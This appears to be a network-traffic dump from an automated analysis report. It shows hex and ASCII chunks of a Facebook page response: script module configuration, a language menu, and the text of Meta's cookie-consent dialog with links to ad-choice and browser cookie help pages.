                                                                                    2023-02-07 18:46:04 UTC1074INData Raw: 53 63 75 62 61 5f 44 45 50 52 45 43 41 54 45 44 22 5d 7d 2c 22 62 65 22 3a 31 7d 2c 22 44 69 61 6c 6f 67 22 3a 7b 22 72 22 3a 5b 22 66 6f 7a 37 6e 77 37 22 2c 22 63 36 6b 70 52 4b 63 22 2c 22 34 44 78 73 6d 66 55 22 2c 22 43 55 70 44 4d 65 31 22 2c 22 58 61 67 66 70 4e 43 22 2c 22 4a 35 68 34 77 4a 73 22 2c 22 30 37 49 69 57 42 5c 2f 22 2c 22 6d 73 4d 63 64 31 30 22 2c 22 54 6a 59 61 35 7a 4d 22 2c 22 59 30 51 72 44 74 4c 22 2c 22 68 47 53 42 6d 42 58 22 2c 22 35 70 39 4a 67 64 39 22 2c 22 4b 6b 38 31 6d 31 59 22 2c 22 42 6e 62 61 6a 53 37 22 2c 22 52 35 77 31 72 43 4a 22 2c 22 64 4b 50 4a 62 71 4a 22 2c 22 65 39 41 4e 7a 77 5c 2f 22 2c 22 79 53 65 57 37 48 67 22 2c 22 55 66 71 36 59 57 58 22 2c 22 37 54 56 58 70 4f 79 22 5d 2c 22 72 64 73 22 3a 7b 22 6d
                                                                                    Data Ascii: Scuba_DEPRECATED"]},"be":1},"Dialog":{"r":["foz7nw7","c6kpRKc","4DxsmfU","CUpDMe1","XagfpNC","J5h4wJs","07IiWB\/","msMcd10","TjYa5zM","Y0QrDtL","hGSBmBX","5p9Jgd9","Kk81m1Y","BnbajS7","R5w1rCJ","dKPJbqJ","e9ANzw\/","ySeW7Hg","Ufq6YWX","7TVXpOy"],"rds":{"m
                                                                                    2023-02-07 18:46:04 UTC1075INData Raw: 22 35 70 39 4a 67 64 39 22 2c 22 42 6e 62 61 6a 53 37 22 2c 22 59 76 32 52 71 37 4e 22 2c 22 4b 6b 38 31 6d 31 59 22 2c 22 37 54 56 58 70 4f 79 22 5d 2c 22 72 64 73 22 3a 7b 22 6d 22 3a 5b 22 46 62 74 4c 6f 67 67 69 6e 67 22 2c 22 49 6e 74 6c 51 74 45 76 65 6e 74 46 61 6c 63 6f 45 76 65 6e 74 22 5d 7d 2c 22 62 65 22 3a 31 7d 2c 22 58 55 49 44 69 61 6c 6f 67 42 6f 64 79 2e 72 65 61 63 74 22 3a 7b 22 72 22 3a 5b 22 54 47 65 73 41 30 61 22 2c 22 49 46 45 66 4e 4d 6c 22 2c 22 52 35 77 31 72 43 4a 22 2c 22 7a 5c 2f 41 4f 4d 42 6d 22 2c 22 54 4b 7a 6d 76 56 46 22 2c 22 54 6a 59 61 35 7a 4d 22 2c 22 35 45 58 57 58 69 47 22 2c 22 42 6e 62 61 6a 53 37 22 2c 22 59 76 32 52 71 37 4e 22 2c 22 37 54 56 58 70 4f 79 22 5d 2c 22 62 65 22 3a 31 7d 2c 22 58 55 49 44 69 61
                                                                                    Data Ascii: "5p9Jgd9","BnbajS7","Yv2Rq7N","Kk81m1Y","7TVXpOy"],"rds":{"m":["FbtLogging","IntlQtEventFalcoEvent"]},"be":1},"XUIDialogBody.react":{"r":["TGesA0a","IFEfNMl","R5w1rCJ","z\/AOMBm","TKzmvVF","TjYa5zM","5EXWXiG","BnbajS7","Yv2Rq7N","7TVXpOy"],"be":1},"XUIDia
                                                                                    2023-02-07 18:46:04 UTC1077INData Raw: 5d 29 3b 7d 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 3e 72 65 71 75 69 72 65 4c 61 7a 79 28 5b 22 54 69 6d 65 53 6c 69 63 65 49 6d 70 6c 22 2c 22 53 65 72 76 65 72 4a 53 22 5d 2c 66 75 6e 63 74 69 6f 6e 28 54 69 6d 65 53 6c 69 63 65 2c 53 65 72 76 65 72 4a 53 29 7b 76 61 72 20 73 3d 28 6e 65 77 20 53 65 72 76 65 72 4a 53 28 29 29 3b 73 2e 68 61 6e 64 6c 65 28 7b 22 64 65 66 69 6e 65 22 3a 5b 5b 22 4c 69 6e 6b 73 68 69 6d 48 61 6e 64 6c 65 72 43 6f 6e 66 69 67 22 2c 5b 5d 2c 7b 22 73 75 70 70 6f 72 74 73 5f 6d 65 74 61 5f 72 65 66 65 72 72 65 72 22 3a 74 72 75 65 2c 22 64 65 66 61 75 6c 74 5f 6d 65 74 61 5f 72 65 66 65 72 72 65 72 5f 70 6f 6c 69 63 79 22 3a 22 6f 72 69 67 69 6e 2d 77 68 65 6e 2d 63 72 6f 73 73 6f 72 69 67 69 6e 22 2c 22 73
                                                                                    Data Ascii: ]);});</script><script>requireLazy(["TimeSliceImpl","ServerJS"],function(TimeSlice,ServerJS){var s=(new ServerJS());s.handle({"define":[["LinkshimHandlerConfig",[],{"supports_meta_referrer":true,"default_meta_referrer_policy":"origin-when-crossorigin","s
                                                                                    2023-02-07 18:46:04 UTC1078INData Raw: 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 34 5f 4e 74 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 35 5f 5a 39 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 36 5f 6f 52 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 37 5f 67 74 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 38 5f 2b 76 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 39 5f 45 72 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 61 5f 6c 58 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 62 5f 73 74 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 63 5f 6e 4f 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37
                                                                                    Data Ascii: rkup_3310c079_0_4_Nt","__markup_3310c079_0_5_Z9","__markup_3310c079_0_6_oR","__markup_3310c079_0_7_gt","__markup_3310c079_0_8_+v","__markup_3310c079_0_9_Er","__markup_3310c079_0_a_lX","__markup_3310c079_0_b_st","__markup_3310c079_0_c_nO","__markup_3310c07
                                                                                    2023-02-07 18:46:04 UTC1080INData Raw: 33 5f 74 36 22 7d 2c 22 6c 61 62 65 6c 22 3a 22 45 6e 67 6c 69 73 68 20 28 55 4b 29 22 2c 22 74 69 74 6c 65 22 3a 22 22 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 7d 2c 7b 22 63 6c 61 73 73 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 2c 22 76 61 6c 75 65 22 3a 22 65 6e 5f 55 53 22 2c 22 73 65 6c 65 63 74 65 64 22 3a 74 72 75 65 2c 22 63 74 6f 72 22 3a 7b 22 5f 5f 6d 22 3a 22 4d 65 6e 75 53 65 6c 65 63 74 61 62 6c 65 49 74 65 6d 22 7d 2c 22 6d 61 72 6b 75 70 22 3a 7b 22 5f 5f 6d 22 3a 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 34 5f 4e 74 22 7d 2c 22 6c 61 62 65 6c 22 3a 22 45 6e 67 6c 69 73 68 20 28 55 53 29 22 2c 22 74 69 74 6c 65 22 3a 22 22 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 68 65 61 64 65 72 49
                                                                                    Data Ascii: 3_t6"},"label":"English (UK)","title":"","className":"headerItem"},{"class":"headerItem","value":"en_US","selected":true,"ctor":{"__m":"MenuSelectableItem"},"markup":{"__m":"__markup_3310c079_0_4_Nt"},"label":"English (US)","title":"","className":"headerI
                                                                                    2023-02-07 18:46:04 UTC1081INData Raw: 74 6f 72 22 3a 7b 22 5f 5f 6d 22 3a 22 4d 65 6e 75 53 65 6c 65 63 74 61 62 6c 65 49 74 65 6d 22 7d 2c 22 6d 61 72 6b 75 70 22 3a 7b 22 5f 5f 6d 22 3a 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 62 5f 73 74 22 7d 2c 22 6c 61 62 65 6c 22 3a 22 4e 6f 72 73 6b 20 28 62 6f 6b 6d 5c 75 30 30 65 35 6c 29 22 2c 22 74 69 74 6c 65 22 3a 22 22 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 7d 2c 7b 22 63 6c 61 73 73 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 2c 22 76 61 6c 75 65 22 3a 22 70 6c 5f 50 4c 22 2c 22 73 65 6c 65 63 74 65 64 22 3a 66 61 6c 73 65 2c 22 63 74 6f 72 22 3a 7b 22 5f 5f 6d 22 3a 22 4d 65 6e 75 53 65 6c 65 63 74 61 62 6c 65 49 74 65 6d 22 7d 2c 22 6d 61 72 6b 75 70 22 3a 7b 22 5f 5f 6d 22 3a 22 5f 5f
                                                                                    Data Ascii: tor":{"__m":"MenuSelectableItem"},"markup":{"__m":"__markup_3310c079_0_b_st"},"label":"Norsk (bokm\u00e5l)","title":"","className":"headerItem"},{"class":"headerItem","value":"pl_PL","selected":false,"ctor":{"__m":"MenuSelectableItem"},"markup":{"__m":"__
                                                                                    2023-02-07 18:46:04 UTC1083INData Raw: 22 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 7d 2c 7b 22 63 6c 61 73 73 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 2c 22 76 61 6c 75 65 22 3a 22 74 72 5f 54 52 22 2c 22 73 65 6c 65 63 74 65 64 22 3a 66 61 6c 73 65 2c 22 63 74 6f 72 22 3a 7b 22 5f 5f 6d 22 3a 22 4d 65 6e 75 53 65 6c 65 63 74 61 62 6c 65 49 74 65 6d 22 7d 2c 22 6d 61 72 6b 75 70 22 3a 7b 22 5f 5f 6d 22 3a 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 6a 5f 68 33 22 7d 2c 22 6c 61 62 65 6c 22 3a 22 54 5c 75 30 30 66 63 72 6b 5c 75 30 30 65 37 65 22 2c 22 74 69 74 6c 65 22 3a 22 22 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 7d 2c 7b 22 63 6c 61 73 73 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 2c 22 76 61 6c 75 65
                                                                                    Data Ascii: ","className":"headerItem"},{"class":"headerItem","value":"tr_TR","selected":false,"ctor":{"__m":"MenuSelectableItem"},"markup":{"__m":"__markup_3310c079_0_j_h3"},"label":"T\u00fcrk\u00e7e","title":"","className":"headerItem"},{"class":"headerItem","value
                                                                                    2023-02-07 18:46:04 UTC1084INData Raw: 30 22 2c 22 74 69 74 6c 65 22 3a 22 22 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 7d 2c 7b 22 63 6c 61 73 73 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 2c 22 76 61 6c 75 65 22 3a 22 74 68 5f 54 48 22 2c 22 73 65 6c 65 63 74 65 64 22 3a 66 61 6c 73 65 2c 22 63 74 6f 72 22 3a 7b 22 5f 5f 6d 22 3a 22 4d 65 6e 75 53 65 6c 65 63 74 61 62 6c 65 49 74 65 6d 22 7d 2c 22 6d 61 72 6b 75 70 22 3a 7b 22 5f 5f 6d 22 3a 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 71 5f 31 77 22 7d 2c 22 6c 61 62 65 6c 22 3a 22 5c 75 30 65 32 30 5c 75 30 65 33 32 5c 75 30 65 32 39 5c 75 30 65 33 32 5c 75 30 65 34 34 5c 75 30 65 31 37 5c 75 30 65 32 32 22 2c 22 74 69 74 6c 65 22 3a 22 22 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 68 65 61
                                                                                    Data Ascii: 0","title":"","className":"headerItem"},{"class":"headerItem","value":"th_TH","selected":false,"ctor":{"__m":"MenuSelectableItem"},"markup":{"__m":"__markup_3310c079_0_q_1w"},"label":"\u0e20\u0e32\u0e29\u0e32\u0e44\u0e17\u0e22","title":"","className":"hea
                                                                                    2023-02-07 18:46:04 UTC1086INData Raw: 53 75 63 63 65 73 73 22 2c 22 4c 61 79 65 72 48 69 64 65 4f 6e 54 72 61 6e 73 69 74 69 6f 6e 22 2c 22 4c 61 79 65 72 52 65 6d 6f 76 65 4f 6e 48 69 64 65 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 39 66 35 66 61 63 31 35 5f 30 5f 30 5f 33 64 22 2c 22 48 54 4d 4c 22 5d 2c 5b 7b 22 77 69 64 74 68 22 3a 36 38 30 2c 22 61 75 74 6f 68 69 64 65 22 3a 6e 75 6c 6c 2c 22 74 69 74 6c 65 49 44 22 3a 6e 75 6c 6c 2c 22 72 65 64 69 72 65 63 74 55 52 49 22 3a 6e 75 6c 6c 2c 22 66 69 78 65 64 54 6f 70 50 6f 73 69 74 69 6f 6e 22 3a 6e 75 6c 6c 2c 22 69 67 6e 6f 72 65 46 69 78 65 64 54 6f 70 49 6e 53 68 6f 72 74 56 69 65 77 70 6f 72 74 22 3a 66 61 6c 73 65 2c 22 6c 61 62 65 6c 22 3a 6e 75 6c 6c 2c 22 6c 61 62 65 6c 6c 65 64 42 79 22 3a 22 6d 61 6e 61 67 65 5f 63 6f 6f 6b 69 65 73
                                                                                    Data Ascii: Success","LayerHideOnTransition","LayerRemoveOnHide","__markup_9f5fac15_0_0_3d","HTML"],[{"width":680,"autohide":null,"titleID":null,"redirectURI":null,"fixedTopPosition":null,"ignoreFixedTopInShortViewport":false,"label":null,"labelledBy":"manage_cookies
                                                                                    2023-02-07 18:46:04 UTC1087INData Raw: 79 30 20 5f 35 35 70 69 20 5f 32 61 67 66 20 5f 34 6f 5f 34 20 5f 39 6f 2d 65 20 5f 70 20 5f 34 6a 79 33 20 5f 35 31 37 68 20 5f 35 31 73 79 5c 22 20 68 72 65 66 3d 5c 22 23 5c 22 20 73 74 79 6c 65 3d 5c 22 6d 61 78 2d 77 69 64 74 68 3a 32 30 30 70 78 3b 5c 22 20 61 72 69 61 2d 68 61 73 70 6f 70 75 70 3d 5c 22 74 72 75 65 5c 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 3d 5c 22 66 61 6c 73 65 5c 22 20 72 65 6c 3d 5c 22 74 6f 67 67 6c 65 5c 22 20 69 64 3d 5c 22 75 5f 30 5f 37 5f 77 5a 5c 22 3e 5c 75 30 30 33 43 73 70 61 6e 20 63 6c 61 73 73 3d 5c 22 5f 2d 78 65 20 5f 33 2d 38 5f 5c 22 3e 5c 75 30 30 33 43 69 20 63 6c 61 73 73 3d 5c 22 69 6d 67 20 73 70 5f 53 74 58 75 31 34 30 71 2d 31 34 20 73 78 5f 34 39 35 30 35 31 5c 22 3e 5c 75 30 30 33 43 5c 2f 69 3e
                                                                                    Data Ascii: y0 _55pi _2agf _4o_4 _9o-e _p _4jy3 _517h _51sy\" href=\"#\" style=\"max-width:200px;\" aria-haspopup=\"true\" aria-expanded=\"false\" rel=\"toggle\" id=\"u_0_7_wZ\">\u003Cspan class=\"_-xe _3-8_\">\u003Ci class=\"img sp_StXu140q-14 sx_495051\">\u003C\/i>
                                                                                    2023-02-07 18:46:04 UTC1088INData Raw: 6e 64 20 69 6d 70 72 6f 76 65 20 4d 65 74 61 20 50 72 6f 64 75 63 74 73 20 66 6f 72 20 70 65 6f 70 6c 65 20 77 68 6f 20 68 61 76 65 20 61 6e 20 61 63 63 6f 75 6e 74 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 78 6f 30 5c 22 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 64 69 76 3e 5c 75 30 30 33 43 64 69 76 3e 46 6f 72 20 61 64 76 65 72 74 69 73 69 6e 67 20 61 6e 64 20 6d 65 61 73 75 72 65 6d 65 6e 74 20 73 65 72 76 69 63 65 73 20 6f 66 66 20 6f 66 20 4d 65 74 61 20 50 72 6f 64 75 63 74 73 2c 20 61 6e 61 6c 79 74 69 63 73 2c 20 61 6e 64 20 74 6f 20 70 72 6f 76 69 64 65 20 63 65 72 74 61 69 6e 20 66 65 61 74 75 72 65 73 20
                                                                                    Data Ascii: nd improve Meta Products for people who have an account\u003C\/div>\u003C\/div>\u003C\/div>\u003Cdiv class=\"_9xo0\">\u003C\/div>\u003Cdiv>\u003Cdiv>For advertising and measurement services off of Meta Products, analytics, and to provide certain features
                                                                                    2023-02-07 18:46:04 UTC1089INData Raw: 35 37 64 61 0d 0a 63 6f 6f 6b 69 65 73 5c 2f 5c 22 20 74 61 72 67 65 74 3d 5c 22 5f 62 6c 61 6e 6b 5c 22 20 63 6c 61 73 73 3d 5c 22 5f 39 6f 2d 76 5c 22 20 69 64 3d 5c 22 63 70 6e 2d 70 76 2d 6c 69 6e 6b 5c 22 3e 43 6f 6f 6b 69 65 20 50 6f 6c 69 63 79 5c 75 30 30 33 43 5c 2f 61 3e 2e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 64 69 76 3e 5c 75 30 30 33 43 64 69 76 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 78 70 76 5c 22 3e 5c 75 30 30 33 43 64 69 76 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 78 70 77 5c 22 3e 45 73 73 65 6e 74 69 61 6c 20 63 6f 6f 6b 69 65 73 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 64 69 76 3e 54 68 65 73 65 20 63 6f 6f 6b 69 65 73 20 61
                                                                                    Data Ascii: 57dacookies\/\" target=\"_blank\" class=\"_9o-v\" id=\"cpn-pv-link\">Cookie Policy\u003C\/a>.\u003C\/div>\u003C\/div>\u003Cdiv>\u003Cdiv>\u003Cdiv class=\"_9xpv\">\u003Cdiv>\u003Cdiv class=\"_9xpw\">Essential cookies\u003C\/div>\u003Cdiv>These cookies a
                                                                                    2023-02-07 18:46:04 UTC1090INData Raw: 75 20 61 6c 6c 6f 77 20 74 68 65 73 65 20 63 6f 6f 6b 69 65 73 3a 5c 75 30 30 33 43 5c 2f 70 3e 5c 75 30 30 33 43 70 20 63 6c 61 73 73 3d 5c 22 5f 39 6f 2d 70 5c 22 3e 5c 75 30 30 33 43 75 6c 20 63 6c 61 73 73 3d 5c 22 5f 39 78 70 5f 5c 22 3e 5c 75 30 30 33 43 6c 69 20 63 6c 61 73 73 3d 5c 22 5f 39 78 71 30 5c 22 3e 57 65 5c 75 32 30 31 39 6c 6c 20 62 65 20 61 62 6c 65 20 74 6f 20 62 65 74 74 65 72 20 70 65 72 73 6f 6e 61 6c 69 7a 65 20 61 64 73 20 66 6f 72 20 79 6f 75 20 6f 66 66 20 6f 66 20 4d 65 74 61 20 50 72 6f 64 75 63 74 73 2c 20 61 6e 64 20 6d 65 61 73 75 72 65 20 74 68 65 69 72 20 70 65 72 66 6f 72 6d 61 6e 63 65 5c 75 30 30 33 43 5c 2f 6c 69 3e 5c 75 30 30 33 43 6c 69 20 63 6c 61 73 73 3d 5c 22 5f 39 78 71 30 5c 22 3e 46 65 61 74 75 72 65 73 20
                                                                                    Data Ascii: u allow these cookies:\u003C\/p>\u003Cp class=\"_9o-p\">\u003Cul class=\"_9xp_\">\u003Cli class=\"_9xq0\">We\u2019ll be able to better personalize ads for you off of Meta Products, and measure their performance\u003C\/li>\u003Cli class=\"_9xq0\">Features
                                                                                    2023-02-07 18:46:04 UTC1092INData Raw: 73 3d 5c 22 5f 39 6e 67 62 20 5f 39 6e 67 61 5c 22 3e 5c 75 30 30 33 43 64 69 76 3e 5c 75 30 30 33 43 70 20 63 6c 61 73 73 3d 5c 22 5f 39 6f 2d 6d 5c 22 3e 49 66 20 79 6f 75 20 68 61 76 65 20 61 20 46 61 63 65 62 6f 6f 6b 20 61 63 63 6f 75 6e 74 2c 20 79 6f 75 20 63 61 6e 20 6d 61 6e 61 67 65 20 68 6f 77 20 64 69 66 66 65 72 65 6e 74 20 64 61 74 61 20 69 73 20 75 73 65 64 20 74 6f 20 70 65 72 73 6f 6e 61 6c 69 7a 65 20 61 64 73 20 77 69 74 68 20 74 68 65 73 65 20 74 6f 6f 6c 73 2e 5c 75 30 30 33 43 5c 2f 70 3e 5c 75 30 30 33 43 70 20 63 6c 61 73 73 3d 5c 22 5f 39 73 69 2d 5c 22 3e 41 64 20 73 65 74 74 69 6e 67 73 5c 75 30 30 33 43 5c 2f 70 3e 5c 75 30 30 33 43 70 20 63 6c 61 73 73 3d 5c 22 5f 39 6f 2d 6d 5c 22 3e 54 6f 20 73 68 6f 77 20 79 6f 75 20 62 65
                                                                                    Data Ascii: s=\"_9ngb _9nga\">\u003Cdiv>\u003Cp class=\"_9o-m\">If you have a Facebook account, you can manage how different data is used to personalize ads with these tools.\u003C\/p>\u003Cp class=\"_9si-\">Ad settings\u003C\/p>\u003Cp class=\"_9o-m\">To show you be
                                                                                    2023-02-07 18:46:04 UTC1093INData Raw: 68 65 6d 2c 20 73 75 63 68 20 61 73 20 76 69 73 69 74 69 6e 67 20 74 68 65 69 72 20 61 70 70 73 20 6f 72 20 77 65 62 73 69 74 65 73 2e 20 54 68 65 79 20 75 73 65 20 6f 75 72 20 5c 75 30 30 33 43 61 20 68 72 65 66 3d 5c 22 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 68 65 6c 70 5c 2f 32 32 33 30 35 30 33 37 39 37 32 36 35 31 35 36 5c 22 3e 42 75 73 69 6e 65 73 73 20 54 6f 6f 6c 73 5c 75 30 30 33 43 5c 2f 61 3e 2c 20 73 75 63 68 20 61 73 20 46 61 63 65 62 6f 6f 6b 20 4c 6f 67 69 6e 20 6f 72 20 4d 65 74 61 20 50 69 78 65 6c 2c 20 74 6f 20 73 68 61 72 65 20 74 68 69 73 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 77 69 74 68 20 75 73 2e 20 54 68 69 73 20 68 65 6c 70 73 20 75 73 20 64 6f 20 74 68 69 6e 67 73 20 73 75 63 68 20
                                                                                    Data Ascii: hem, such as visiting their apps or websites. They use our \u003Ca href=\"https:\/\/www.facebook.com\/help\/2230503797265156\">Business Tools\u003C\/a>, such as Facebook Login or Meta Pixel, to share this information with us. This helps us do things such
                                                                                    2023-02-07 18:46:04 UTC1095INData Raw: 70 73 3a 5c 2f 5c 2f 6c 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 6c 2e 70 68 70 3f 75 3d 68 74 74 70 73 5c 75 30 30 32 35 33 41 5c 75 30 30 32 35 32 46 5c 75 30 30 32 35 32 46 79 6f 75 72 61 64 63 68 6f 69 63 65 73 2e 63 61 5c 75 30 30 32 35 32 46 26 61 6d 70 3b 68 3d 41 54 33 6e 6b 39 6e 50 43 41 46 52 68 4e 58 37 51 77 78 62 6f 53 41 33 37 66 43 34 55 41 66 78 4c 6a 2d 53 66 48 4f 67 32 6e 51 45 50 58 4c 77 34 78 6b 5f 71 61 76 71 65 47 37 56 47 74 6c 63 74 59 65 4e 32 74 32 5a 75 44 38 46 32 6c 67 63 48 6a 58 65 35 53 7a 51 7a 67 49 4c 4a 72 36 44 77 4a 5a 68 42 46 49 64 44 49 6e 53 66 35 63 38 70 4b 74 38 53 6d 4d 63 31 50 72 66 32 33 75 6d 63 39 35 75 6d 6d 79 64 6f 50 46 64 5a 56 38 41 37 70 71 4d 72 77 5c 22 20 74 61 72 67 65 74 3d 5c 22 5f 62
                                                                                    Data Ascii: ps:\/\/l.facebook.com\/l.php?u=https\u00253A\u00252F\u00252Fyouradchoices.ca\u00252F&amp;h=AT3nk9nPCAFRhNX7QwxboSA37fC4UAfxLj-SfHOg2nQEPXLw4xk_qavqeG7VGtlctYeN2t2ZuD8F2lgcHjXe5SzQzgILJr6DwJZhBFIdDInSf5c8pKt8SmMc1Prf23umc95ummydoPFdZV8A7pqMrw\" target=\"_b
                                                                                    2023-02-07 18:46:04 UTC1096INData Raw: 36 33 6d 63 78 6c 45 45 43 5f 33 4f 33 4c 78 30 49 31 39 48 35 4f 4d 61 58 34 44 5f 57 6d 4f 6c 33 67 77 4b 71 59 46 4c 37 41 46 61 6f 5a 74 77 5f 52 6e 6d 37 49 73 4c 4f 6a 4d 71 50 4a 6e 41 5c 22 20 74 61 72 67 65 74 3d 5c 22 5f 62 6c 61 6e 6b 5c 22 20 72 65 6c 3d 5c 22 6e 6f 66 6f 6c 6c 6f 77 5c 22 20 64 61 74 61 2d 6c 79 6e 78 2d 6d 6f 64 65 3d 5c 22 61 73 79 6e 63 6c 61 7a 79 5c 22 3e 44 69 67 69 74 61 6c 20 41 64 76 65 72 74 69 73 69 6e 67 20 41 6c 6c 69 61 6e 63 65 5c 75 30 30 33 43 5c 2f 61 3e 5c 75 30 30 33 43 5c 2f 6c 69 3e 5c 75 30 30 33 43 6c 69 3e 5c 75 30 30 33 43 61 20 68 72 65 66 3d 5c 22 68 74 74 70 73 3a 5c 2f 5c 2f 6c 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 6c 2e 70 68 70 3f 75 3d 68 74 74 70 73 5c 75 30 30 32 35 33 41 5c 75 30 30
                                                                                    Data Ascii: 63mcxlEEC_3O3Lx0I19H5OMaX4D_WmOl3gwKqYFL7AFaoZtw_Rnm7IsLOjMqPJnA\" target=\"_blank\" rel=\"nofollow\" data-lynx-mode=\"asynclazy\">Digital Advertising Alliance\u003C\/a>\u003C\/li>\u003Cli>\u003Ca href=\"https:\/\/l.facebook.com\/l.php?u=https\u00253A\u00
                                                                                    2023-02-07 18:46:04 UTC1098INData Raw: 6d 5c 22 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 6f 72 20 64 65 76 69 63 65 20 6d 61 79 20 6f 66 66 65 72 20 73 65 74 74 69 6e 67 73 20 74 68 61 74 20 61 6c 6c 6f 77 20 79 6f 75 20 74 6f 20 63 68 6f 6f 73 65 20 77 68 65 74 68 65 72 20 62 72 6f 77 73 65 72 20 63 6f 6f 6b 69 65 73 20 61 72 65 20 73 65 74 20 61 6e 64 20 74 6f 20 64 65 6c 65 74 65 20 74 68 65 6d 2e 20 54 68 65 73 65 20 63 6f 6e 74 72 6f 6c 73 20 76 61 72 79 20 62 79 20 62 72 6f 77 73 65 72 2c 20 61 6e 64 20 6d 61 6e 75 66 61 63 74 75 72 65 72 73 20 6d 61 79 20 63 68 61 6e 67 65 20 62 6f 74 68 20 74 68 65 20 73 65 74 74 69 6e 67 73 20 74 68 65 79 20 6d 61 6b 65 20 61 76 61 69 6c 61 62 6c 65 20 61 6e 64 20 68 6f 77 20 74 68 65 79 20 77 6f 72 6b 20 61 74 20 61 6e 79 20 74 69 6d 65 2e 20 41 73
                                                                                    Data Ascii: m\">Your browser or device may offer settings that allow you to choose whether browser cookies are set and to delete them. These controls vary by browser, and manufacturers may change both the settings they make available and how they work at any time. As
                                                                                    2023-02-07 18:46:04 UTC1099INData Raw: 6f 6f 6b 2e 63 6f 6d 5c 2f 6c 2e 70 68 70 3f 75 3d 68 74 74 70 73 5c 75 30 30 32 35 33 41 5c 75 30 30 32 35 32 46 5c 75 30 30 32 35 32 46 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 5c 75 30 30 32 35 32 46 65 6e 2d 55 53 5c 75 30 30 32 35 32 46 6b 62 5c 75 30 30 32 35 32 46 65 6e 61 62 6c 65 2d 61 6e 64 2d 64 69 73 61 62 6c 65 2d 63 6f 6f 6b 69 65 73 2d 77 65 62 73 69 74 65 2d 70 72 65 66 65 72 65 6e 63 65 73 26 61 6d 70 3b 68 3d 41 54 32 4f 74 5f 39 56 4b 77 55 7a 74 31 33 42 6c 4b 56 64 6b 61 61 2d 33 37 42 33 43 36 2d 4f 70 49 4f 7a 7a 30 71 4a 69 52 4e 6c 7a 67 2d 71 44 6f 34 70 30 42 67 4c 37 4e 6f 74 39 44 47 68 7a 57 62 47 47 6c 76 34 69 59 71 4b 49 69 4b 4a 49 55 5f 48 4e 66 44 51 57 43 56 4f 46 34 6e 4e 53 6e 30 50 5f 58 55 6a 51 33
                                                                                    Data Ascii: ook.com\/l.php?u=https\u00253A\u00252F\u00252Fsupport.mozilla.org\u00252Fen-US\u00252Fkb\u00252Fenable-and-disable-cookies-website-preferences&amp;h=AT2Ot_9VKwUzt13BlKVdkaa-37B3C6-OpIOzz0qJiRNlzg-qDo4p0BgL7Not9DGhzWbGGlv4iYqKIiKJIU_HNfDQWCVOF4nNSn0P_XUjQ3
